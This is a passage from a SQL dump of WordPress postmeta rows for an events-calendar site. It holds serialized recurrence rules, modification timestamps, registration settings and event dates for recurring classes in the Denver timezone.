currence\";i:1608755008;s:18:\"_RTECnumRegistered\";i:1608755008;s:12:\"_dp_original\";i:1608755008;s:13:\"_EventVenueID\";i:1608755008;s:16:\"tribe_events_cat\";i:1609185778;s:10:\"_edit_last\";i:1608755167;s:12:\"post_content\";i:1608756633;s:11:\"post_status\";i:1608755836;s:10:\"post_title\";i:1608755955;}'),(122323,263251,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(115662,262791,'_EventCurrencySymbol',''),(115663,262791,'_EventCurrencyPosition','prefix'),(122278,263249,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:12:{i:0;a:2:{s:9:\"timestamp\";i:1607256000;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1609675200;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1612699200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1615118400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1617537600;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1619956800;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1622980800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1625400000;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1627819200;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1630843200;s:8:\"duration\";i:5400;}i:10;a:2:{s:9:\"timestamp\";i:1633262400;s:8:\"duration\";i:5400;}i:11;a:2:{s:9:\"timestamp\";i:1636286400;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:22;}'),(119627,262750,'_EventOrigin','events-calendar'),(119408,262743,'_EventVenueID','262507'),(119389,262743,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119597,262749,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(112969,262749,'_EventStartDate','2021-08-10 19:00:00'),(119566,262748,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2021-01-12 19:00:00\";s:12:\"EventEndDate\";s:19:\"2021-01-12 20:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119552,262748,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119605,262749,'_EventCurrencyPosition','prefix'),(119606,262749,'_EventCost',''),(119553,262748,'_EventOrigin','events-calendar'),(119554,262748,'_EventOrigin','events-calendar'),(119555,262748,'_EventOrigin','events-calendar'),(119556,262748,'_EventOrigin','events-calendar'),(119557,262748,'_EventOrigin','events-calendar'),(119558,262748,'_EventOrigin','events-calendar'),(119559,262748,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119518,262747,'_EventOrigin','events-calendar'),(119519,262747,'_EventOrigin','events-calendar'),(119520,262747,'_EventOrigin','events-calendar'),(119521,262747,'_EventOrigin','events-calendar'),(119522,262747,'_EventOrigin','events-calendar'),(119523,262747,'_EventOrigin','events-calendar'),(119524,262747,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119517,262747,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(112926,262748,'_EventStartDate','2021-07-13 19:00:00'),(112927,262748,'_EventStartDateUTC','2021-07-14 01:00:00'),(112928,262748,'_EventEndDate','2021-07-13 20:00:00'),(112929,262748,'_EventEndDateUTC','2021-07-14 02:00:00'),(119565,262748,'boldgrid_hide_page_title','1'),(112930,262748,'_EventDuration','3600'),(119560,262748,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119567,262748,'_EventShowMapLink','1'),(119568,262748,'_EventShowMap','1'),(119561,262748,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119569,262748,'_EventCurrencySymbol',''),(119570,262748,'_EventCurrencyPosition','prefix'),(119571,262748,'_EventCost',''),(119572,262748,'_EventURL',''),(119573,262748,'_EventTimezone','America/Denver'),(119574,262748,'_EventNextPendingRecurrence','2022-01-11 19:00:00'),(119575,262748,'_dp_original','225321'),(119576,262748,'protect_children',''),(119577,262748,'_RTECregistrationsDisabled','1'),(119578,262748,'_RTECdeadlineType','start'),(119579,262748,'_RTECwhoCanRegister','any'),(119580,262748,'_RTEClimitRegistrations','0'),(119581,262748,'_RTECmaxRegistrations','30'),(151783,266078,'passster_protection_type','password'),(119583,262748,'_EventVenueID','262507'),(119584,262748,'_wp_old_slug','boulder-easy-way-class'),(119585,262748,'_wp_old_slug','letters-of-light-and-sound-1-2'),(119586,262748,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:9:{i:262743;a:2:{s:9:\"timestamp\";i:1612897200;s:8:\"duration\";i:3600;}i:262744;a:2:{s:9:\"timestamp\";i:1615316400;s:8:\"duration\";i:3600;}i:262745;a:2:{s:9:\"timestamp\";i:1618340400;s:8:\"duration\";i:3600;}i:262746;a:2:{s:9:\"timestamp\";i:1620759600;s:8:\"duration\";i:3600;}i:262747;a:2:{s:9:\"timestamp\";i:1623178800;s:8:\"duration\";i:3600;}i:262748;a:2:{s:9:\"timestamp\";i:1626202800;s:8:\"duration\";i:3600;}i:262749;a:2:{s:9:\"timestamp\";i:1628622000;s:8:\"duration\";i:3600;}i:262750;a:2:{s:9:\"timestamp\";i:1631646000;s:8:\"duration\";i:3600;}i:262751;a:2:{s:9:\"timestamp\";i:1634065200;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:9;}'),(119563,262748,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119562,262748,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119564,262748,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(115652,262791,'_RTECregistrationsDisabled','1'),(115653,262791,'_RTECdeadlineType','start'),(115654,262791,'_RTECwhoCanRegister','any'),(115655,262791,'_RTEClimitRegistrations','0'),(115656,262791,'_RTECmaxRegistrations','30'),(115657,262791,'boldgrid_hide_page_title','0'),(119431,262744,'_EventCost',''),(122486,263255,'_RTECdeadlineType','start'),(122472,263255,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628580;s:24:\"boldgrid_hide_page_title\";i:1610628580;s:16:\"_EventRecurrence\";i:1610628580;s:17:\"_EventShowMapLink\";i:1610628580;s:13:\"_EventShowMap\";i:1610628580;s:20:\"_EventCurrencySymbol\";i:1610628580;s:22:\"_EventCurrencyPosition\";i:1610628580;s:10:\"_EventCost\";i:1610628580;s:9:\"_EventURL\";i:1610628580;s:14:\"_EventTimezone\";i:1610628580;s:12:\"_dp_original\";i:1610628580;s:16:\"protect_children\";i:1610628580;s:26:\"_RTECregistrationsDisabled\";i:1610628580;s:17:\"_RTECdeadlineType\";i:1610628580;s:19:\"_RTECwhoCanRegister\";i:1610628580;s:23:\"_RTEClimitRegistrations\";i:1610628580;s:21:\"_RTECmaxRegistrations\";i:1610628580;s:13:\"_EventVenueID\";i:1610628580;s:13:\"_thumbnail_id\";i:1610628580;s:12:\"_wp_old_slug\";i:1610628580;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628580;s:16:\"tribe_events_cat\";i:1610653780;}'),(122477,263255,'_EventShowMap','1'),(122473,263255,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628580;s:24:\"boldgrid_hide_page_title\";i:1610628580;s:16:\"_EventRecurrence\";i:1610628580;s:17:\"_EventShowMapLink\";i:1610628580;s:13:\"_EventShowMap\";i:1610628580;s:20:\"_EventCurrencySymbol\";i:1610628580;s:22:\"_EventCurrencyPosition\";i:1610628580;s:10:\"_EventCost\";i:1610628580;s:9:\"_EventURL\";i:1610628580;s:14:\"_EventTimezone\";i:1610628580;s:12:\"_dp_original\";i:1610628580;s:16:\"protect_children\";i:1610628580;s:26:\"_RTECregistrationsDisabled\";i:1610628580;s:17:\"_RTECdeadlineType\";i:1610628580;s:19:\"_RTECwhoCanRegister\";i:1610628580;s:23:\"_RTEClimitRegistrations\";i:1610628580;s:21:\"_RTECmaxRegistrations\";i:1610628580;s:13:\"_EventVenueID\";i:1610628580;s:13:\"_thumbnail_id\";i:1610628580;s:12:\"_wp_old_slug\";i:1610628580;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628580;s:16:\"tribe_events_cat\";i:1610653780;}'),(122476,263255,'_EventShowMapLink','1'),(122123,263245,'_dp_original','201534'),(122124,263245,'protect_children',''),(113821,225018,'_wp_old_slug','the-easy-way'),(120868,263177,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609513573;s:12:\"_EventOrigin\";i:1609513573;s:13:\"_thumbnail_id\";i:1609513848;s:24:\"boldgrid_hide_page_title\";i:1609513573;s:17:\"_EventShowMapLink\";i:1609513573;s:13:\"_EventShowMap\";i:1609513573;s:15:\"_EventStartDate\";i:1609513848;s:13:\"_EventEndDate\";i:1609513848;s:18:\"_EventStartDateUTC\";i:1609513848;s:16:\"_EventEndDateUTC\";i:1609513848;s:14:\"_EventDuration\";i:1609513573;s:20:\"_EventCurrencySymbol\";i:1609513573;s:22:\"_EventCurrencyPosition\";i:1609513573;s:10:\"_EventCost\";i:1609513573;s:9:\"_EventURL\";i:1609513573;s:14:\"_EventTimezone\";i:1609513573;s:18:\"_EventTimezoneAbbr\";i:1609513573;s:27:\"_EventNextPendingRecurrence\";i:1609513573;s:26:\"_RTECregistrationsDisabled\";i:1609513573;s:17:\"_RTECdeadlineType\";i:1609513573;s:19:\"_RTECwhoCanRegister\";i:1609513573;s:23:\"_RTEClimitRegistrations\";i:1609513573;s:21:\"_RTECmaxRegistrations\";i:1609513573;s:16:\"_EventRecurrence\";i:1609513573;s:18:\"_RTECnumRegistered\";i:1609513573;s:13:\"_EventVenueID\";i:1609513573;s:12:\"_dp_original\";i:1609513573;s:16:\"tribe_events_cat\";i:1609540873;s:10:\"_edit_last\";i:1609513648;s:10:\"post_title\";i:1609513648;s:12:\"post_content\";i:1609515673;s:11:\"post_status\";i:1609513848;}'),(122506,263256,'_EventOrigin','events-calendar'),(122501,263256,'_EventEndDateUTC','2021-11-07 20:30:00'),(121676,263232,'protect_children',''),(124572,263321,'_RTEClimitRegistrations','0'),(121678,263232,'_EventOrigin','events-calendar'),(121679,263232,'_EventOrigin','events-calendar'),(121680,263232,'_EventOrigin','events-calendar'),(121681,263232,'_EventOrigin','events-calendar'),(124565,263321,'protect_children',''),(124566,263321,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1610630038;s:12:\"_EventOrigin\";i:1610630038;s:13:\"_thumbnail_id\";i:1610630038;s:26:\"_RTECregistrationsDisabled\";i:1610630038;s:17:\"_RTECdeadlineType\";i:1610630038;s:19:\"_RTECwhoCanRegister\";i:1610630038;s:23:\"_RTEClimitRegistrations\";i:1610630038;s:21:\"_RTECmaxRegistrations\";i:1610630038;s:24:\"boldgrid_hide_page_title\";i:1610630038;s:16:\"_EventRecurrence\";i:1610630212;s:17:\"_EventShowMapLink\";i:1610630038;s:13:\"_EventShowMap\";i:1610630038;s:13:\"_EventVenueID\";i:1610630039;s:15:\"_EventStartDate\";i:1610630212;s:13:\"_EventEndDate\";i:1610630212;s:18:\"_EventStartDateUTC\";i:1610630212;s:16:\"_EventEndDateUTC\";i:1610630212;s:14:\"_EventDuration\";i:1610630212;s:20:\"_EventCurrencySymbol\";i:1610630039;s:22:\"_EventCurrencyPosition\";i:1610630039;s:10:\"_EventCost\";i:1610630039;s:9:\"_EventURL\";i:1610630039;s:14:\"_EventTimezone\";i:1610630039;s:18:\"_EventTimezoneAbbr\";i:1610630039;s:12:\"_dp_original\";i:1610630039;s:10:\"_edit_last\";i:1610630110;s:10:\"post_title\";i:1610630110;s:12:\"post_content\";i:1610630212;s:16:\"tribe_events_cat\";i:1610655620;s:11:\"post_status\";i:1610630212;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630423;}'),(124555,263319,'_EventDuration','32400'),(124556,263319,'_EventCurrencySymbol',''),(121688,263232,'_EventShowMap','1'),(124554,263319,'_EventEndDateUTC','2021-01-15 00:00:00'),(121689,263232,'_EventStartDate','2021-01-18 19:00:00'),(124552,263319,'_EventEndDate','2021-01-14 17:00:00'),(124553,263319,'_EventStartDateUTC','2021-01-14 15:00:00'),(120893,263177,'_EventURL',''),(122524,263256,'_RTEClimitRegistrations','0'),(122478,263255,'_EventCurrencySymbol',''),(151827,266081,'mec_end_time_ampm','PM'),(114486,262792,'_EventDuration','4200'),(115688,262792,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262791;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4200;}i:262792;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4200;}i:262793;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4200;}i:262794;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4200;}i:262795;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4200;}i:262796;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4200;}i:262797;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4200;}i:262798;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4200;}i:262799;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4200;}i:262800;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(114483,262792,'_EventStartDateUTC','2021-02-21 16:00:00'),(114482,262792,'_EventStartDate','2021-02-21 09:00:00'),(115648,262791,'protect_children',''),(115649,262791,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511403;s:12:\"_EventOrigin\";i:1607511403;s:13:\"_thumbnail_id\";i:1607511403;s:26:\"_RTECregistrationsDisabled\";i:1607511403;s:17:\"_RTECdeadlineType\";i:1607511403;s:19:\"_RTECwhoCanRegister\";i:1607511403;s:23:\"_RTEClimitRegistrations\";i:1607511403;s:21:\"_RTECmaxRegistrations\";i:1607511403;s:24:\"boldgrid_hide_page_title\";i:1607511403;s:16:\"_EventRecurrence\";i:1607511403;s:17:\"_EventShowMapLink\";i:1607511403;s:13:\"_EventShowMap\";i:1607511403;s:13:\"_EventVenueID\";i:1607511403;s:20:\"_EventCurrencySymbol\";i:1607511403;s:22:\"_EventCurrencyPosition\";i:1607511403;s:10:\"_EventCost\";i:1607511403;s:9:\"_EventURL\";i:1607511403;s:14:\"_EventTimezone\";i:1607511403;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511403;s:16:\"tribe_events_cat\";i:1607536603;}'),(115647,262791,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511403;s:12:\"_EventOrigin\";i:1607511403;s:13:\"_thumbnail_id\";i:1607511403;s:26:\"_RTECregistrationsDisabled\";i:1607511403;s:17:\"_RTECdeadlineType\";i:1607511403;s:19:\"_RTECwhoCanRegister\";i:1607511403;s:23:\"_RTEClimitRegistrations\";i:1607511403;s:21:\"_RTECmaxRegistrations\";i:1607511403;s:24:\"boldgrid_hide_page_title\";i:1607511403;s:16:\"_EventRecurrence\";i:1607511403;s:17:\"_EventShowMapLink\";i:1607511403;s:13:\"_EventShowMap\";i:1607511403;s:13:\"_EventVenueID\";i:1607511403;s:20:\"_EventCurrencySymbol\";i:1607511403;s:22:\"_EventCurrencyPosition\";i:1607511403;s:10:\"_EventCost\";i:1607511403;s:9:\"_EventURL\";i:1607511403;s:14:\"_EventTimezone\";i:1607511403;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511403;s:16:\"tribe_events_cat\";i:1607536603;}'),(114453,262791,'_EventStartDateUTC','2021-01-17 16:00:00'),(114452,262791,'_EventStartDate','2021-01-17 